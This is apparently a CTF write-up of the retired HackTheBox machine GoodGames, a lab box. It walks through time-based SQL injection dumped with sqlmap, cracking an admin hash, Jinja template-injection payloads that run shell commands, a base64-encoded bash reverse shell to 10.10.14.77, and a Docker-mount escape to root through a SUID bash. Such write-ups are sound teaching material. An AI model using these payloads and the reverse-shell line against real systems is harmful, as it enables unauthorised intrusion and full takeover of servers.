Hello everyone , in this post I will be sharing my writeup for HTB-GoodGames machine which was an easy linux box that was made for the purpose of HTB University CTF hacking and was released into retired machines pool , starting off with nmap , we can see only port 80 is open on which there’s web page that allows us to login , the login page was vulnerable sqli which was a time based sql injection , through sqlmap we dumped the data through which we found admin hash for the web page , after cracking that we logged into the site and found another login page for a flask application which we got access through password reuse of admin user , being a flask application it was vulnerable to Server Side Template Injection SSTI which gave us a reverse shell from command execution and we landed in a docker container . The container had mounted a file system of host machine specifically home directory of augustus , after putting the ssh public key there we were able to login on the host machine as the gateway IP of docker was of host machine and since we had access to that directory and files were being created as a root user we were able to put a copy of bash with SUID and get root on the host machine.
NMAP
PORT STATE SERVICE VERSION
80/tcp open ssl/http Werkzeug/2.0.2 Python/3.9.2
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS POST
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and StorePORT 80 (HTTP)
Visting port 80 it shows us about a gaming page where it lists the current games
But it’s just a static page where these links won’t lead to anywhere , there’s a page to a store which says that it will be available soon
There’s a login page but it asks for an email address so I left this form , and went with signing up a user
After creating a user we can login on the site
With the password reset , I tried to see if it was taking a user name in the parameters
It wasn’t taking any username so taking a step back on the login page
We can’t perform sqli like this as it’s matching the format of an email address so , I intercepted the request with burp and save the request , after that ran sqlmap
This shows that it’s vulnerable to sqli , so let’s just dump the database.
Being a time based sqli , it was taking some time to dump the data , so we only want the users table so let’s just dump that
sqlmap -r sql --batch -D main -T user --dumpWe can then just skip the rest of the data as we only needed the admin hash, using crackstation to crack hash we can get the password superadministrator
So logging with the admin credentials
On becoming admin , we can see another options which would take us to internal-administration.goodgames.htb
This brings us another login page for Flask Volt
I looked if there were any default credentials for this but it seems that it’s just a template on github for flask applications login page and being a flask application it might be vulnerable to one of the common attacks which is Server Side Template Injection SSTI maybe as this is the first thing that I would look at
So now let’s look for an input field where we can test for SSTI payloads
Setting page has an input field for username , so testing with payload {{7*7}} it should return the result 49
It did now we need to find which template engine it’s using , to do that we can check with payload {{7*'7'}} , if it still returns the result 49 that means it's using twig or if it returns 7777777 then it's using jinja
So it’s jinja , now we need to look for payload to get command execution
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}Using this payload we can execute shell commands
This returns as a root user , normally you would get a low privileged user like www-data or some other user could be that this application is hosted in a docker container , using bash reverse shell we can get a shell by first convert the reverse shell payload to base64
echo "bash -i >& /dev/tcp/10.10.14.77/2222 0>&1" | base64{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43Ny8yMjIyIDA+JjEK" |base64 -d| bash').read() }}
Running ifconfig
This IP address tells that we are indeed inside in a container , running df -h to see disk space we can see a directory /home/augustus from /dev/sda1 as this user doesn't exist on this docker container this probably mounted from the host machine
So here I thought of adding an ssh for augustus by creating a .ssh folder and adding the public key in authorized_keys file
And then changing the owner of that folder to augustus
But the host machine didn’t had ssh service running when we ran nmap , could be that it’s open locally or we can access it from the container
We can’t , we know that this container’s IP address is 172.19.0.2 and whenever we run a docker container on a host machine that machine becomes a gateway and the IP is assigned to 172.19.0.1
Let’s verify this by transferring a static binary of nmap
This shows that port 80 and 22 is open , so let’s give it a shot
And we are on the host machine now
Running sudo -l to see what permissions we have but there's no sudo binary
So going back again , we saw that we can change permissions in augustus’s folder ,so let’s just create a file and see if it gets reflected with the room permissions
Logging back again , we see that the file has root permissions , so we can just copy bash , make it a SUID and run it on the host machine
But it didn’t ran and started screaming about a library file so I transferred my host machine’s bash file on the docker container , made that a SUID again and then tried running the binary and it worked
